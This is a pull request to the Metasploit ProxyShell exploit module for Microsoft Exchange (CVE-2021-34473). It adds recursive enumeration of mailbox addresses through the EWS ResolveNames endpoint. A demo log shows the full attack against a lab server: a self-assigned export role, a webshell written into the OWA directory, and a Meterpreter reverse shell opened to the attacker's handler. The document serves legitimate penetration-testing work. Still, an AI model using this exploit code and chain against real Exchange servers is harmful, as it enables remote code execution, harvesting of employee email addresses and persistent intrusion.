### PR TITLE
Fix enumerating emails via ProxyShell

### DIFF
--- a/data/exploits/proxymaybeshell/soap_getemails.xml.erb
+++ b/data/exploits/proxymaybeshell/soap_getemails.xml.erb
@@ -8,7 +8,7 @@
   </soap:Header>
   <soap:Body>
     <m:ResolveNames ReturnFullContactData="true" SearchScope="ActiveDirectory">
-      <m:UnresolvedEntry>SMTP:</m:UnresolvedEntry>
+      <m:UnresolvedEntry><%= name %></m:UnresolvedEntry>
     </m:ResolveNames>
   </soap:Body>
 </soap:Envelope>

--- a/modules/exploits/windows/http/exchange_proxyshell_rce.rb
+++ b/modules/exploits/windows/http/exchange_proxyshell_rce.rb
@@ -320,17 +320,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_emails
-    envelope = XMLTemplate.render('soap_getemails')
-    res = send_http('POST', '/ews/exchange.asmx', data: envelope, ctype: 'text/xml;charset=UTF-8')
-    fail_with(Failure::UnexpectedReply, 'Failed to enumerate email addresses from Active Directory') unless res&.code == 200
-
     mailbox_table = Rex::Text::Table.new(
       'Header' => 'Exchange Mailboxes',
       'Columns' => %w[EmailAddress Name RoutingType MailboxType]
     )
-    xml_ns = { 't' => 'http://schemas.microsoft.com/exchange/services/2006/types' }
-    res.get_xml_document.xpath('//t:Mailbox', xml_ns).each do |mailbox|
-      mailbox_table << %w[t:EmailAddress t:Name t:RoutingType t:MailboxType].map { |xpath| mailbox.xpath(xpath, xml_ns)&.text || '' }
+
+    MailboxEnumerator.new(self).each do |row|
+      mailbox_table << row
     end
 
     print_status("Enumerated #{mailbox_table.rows.length} email addresses")
@@ -477,6 +473,42 @@ class MetasploitModule < Msf::Exploit::Remote
       'ctype' => 'application/x-www-form-urlencoded',
       'data' => "#{@shell_input_name}=#{cmd}"
     )
+  end
+end
+
+# Use https://learn.microsoft.com/en-us/exchange/client-developer/web-service-reference/resolvenames to resolve mailbox
+# information. The endpoint only returns 100 at a time though so if the target has more than that many email addresses
+# multiple requests will need to be made. Since the endpoint doesn't support pagination, we refine the query by using
+# progressively larger search prefixes until there are less than 101 results and thus will fit into a single response.
+class MailboxEnumerator
+  def initialize(mod)
+    @mod = mod
+  end
+
+  # the characters that Exchange Server 2019 allows in an alias (no unicode)
+  ALIAS_CHARSET = 'abcdefghijklmnopqrstuvwxyz0123456789!#$%&\'*+-/=?^_`{|}~'.freeze
+  XML_NS = {
+    'm' => 'http://schemas.microsoft.com/exchange/services/2006/messages',
+    't' => 'http://schemas.microsoft.com/exchange/services/2006/types'
+  }.freeze
+
+  include Enumerable
+  XMLTemplate = Msf::Exploit::Remote::HTTP::Exchange::ProxyMaybeShell::XMLTemplate
+
+  def each(name: 'SMTP:', &block)
+    envelope = XMLTemplate.render('soap_getemails', name: name)
+    res = @mod.send_http('POST', '/ews/exchange.asmx', data: envelope, ctype: 'text/xml;charset=UTF-8')
+    return unless res&.code == 200
+
+    if res.get_xml_document.xpath('//m:ResolutionSet/@IncludesLastItemInRange', XML_NS).first&.text&.downcase == 'false'
+      ALIAS_CHARSET.each_char do |char|
+        each(name: name + char, &block)
+      end
+    else
+      res.get_xml_document.xpath('//t:Mailbox', XML_NS).each do |mailbox|
+        yield %w[t:EmailAddress t:Name t:RoutingType t:MailboxType].map { |xpath| mailbox.xpath(xpath, XML_NS)&.text || '' }
+      end
+    end
   end
 end
 


### PR DESCRIPTION
The ResolveNames endpoint used to gather emails addresses for targeting only returns 100 at a time. This updates the module to check if the search result contains all entries and when it does, it recurses into itself with a refined search prefix. All results are returned to match the original functionality instead of enumerating and halting once one that's suitable for exploitation has been found.

This closes #17206 

To reproduce the original issue, use [davidprowe/BadBlood](https://github.com/davidprowe/BadBlood) on the domain controller. Use the default values and it'll add a large number of accounts. Next, go to the Exchange server and run the Exchange Management Console (the PowerShell one) and then run `Get-User | Enable-Mailbox` and presto you have a whole lotta mailboxes.

## Testing
- [ ] Setup your Exchange server with a large number of email addresses
- [ ] Run the ProxyShell exploit with VERBOSE on (it'll show you that it's doing things)
- [ ] See that more than 100 emails are enumerated, you can also check the CSV file that's written out to disk
  * When I compared the results, the CSV / enumerated output was missing one mailbox, the Discovery one. Since that's not tied to an account, it's not really useful for exploitation anyways.
- [ ] See the exploit succeed, it may take a (long) while

## Demo
```
msf6 exploit(windows/http/exchange_proxyshell_rce) > rerun
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Attempt to exploit for CVE-2021-34473
[*] Retrieving backend FQDN over RPC request
[*] Internal server name: exchange2019.msflab.local
[*] Enumerating valid email addresses and searching for one that either has the 'Mailbox Import Export' role or can self-assign it
[*] Enumerated 999 email addresses
[*] Saved mailbox and email address data to: /home/smcintyre/.msf4/loot/20221202160302_default_192.168.159.11_ad.exchange.mail_972843.txt
[+] Successfully assigned the 'Mailbox Import Export' role
[+] Proceeding with SID: S-1-5-21-3402587289-1488798532-3618296993-1000 (smcintyre@msflab.local)
[*] Saving a draft email with subject '8xSFKHLdNX' containing the attachment with the embedded webshell
[*] Writing to: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\I3XUIOfYWll.aspx
[*] Waiting for the export request to complete...
[+] The mailbox export request has completed
[*] Triggering the payload
[*] Sending stage (200774 bytes) to 192.168.159.11
[*] Meterpreter session 3 opened (192.168.159.128:4444 -> 192.168.159.11:12790) at 2022-12-02 16:10:48 -0500
[!] This exploit may require manual cleanup of 'C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\I3XUIOfYWll.aspx' on the target
[*] Removing the mailbox export request
[*] Removing the draft email

meterpreter > 
```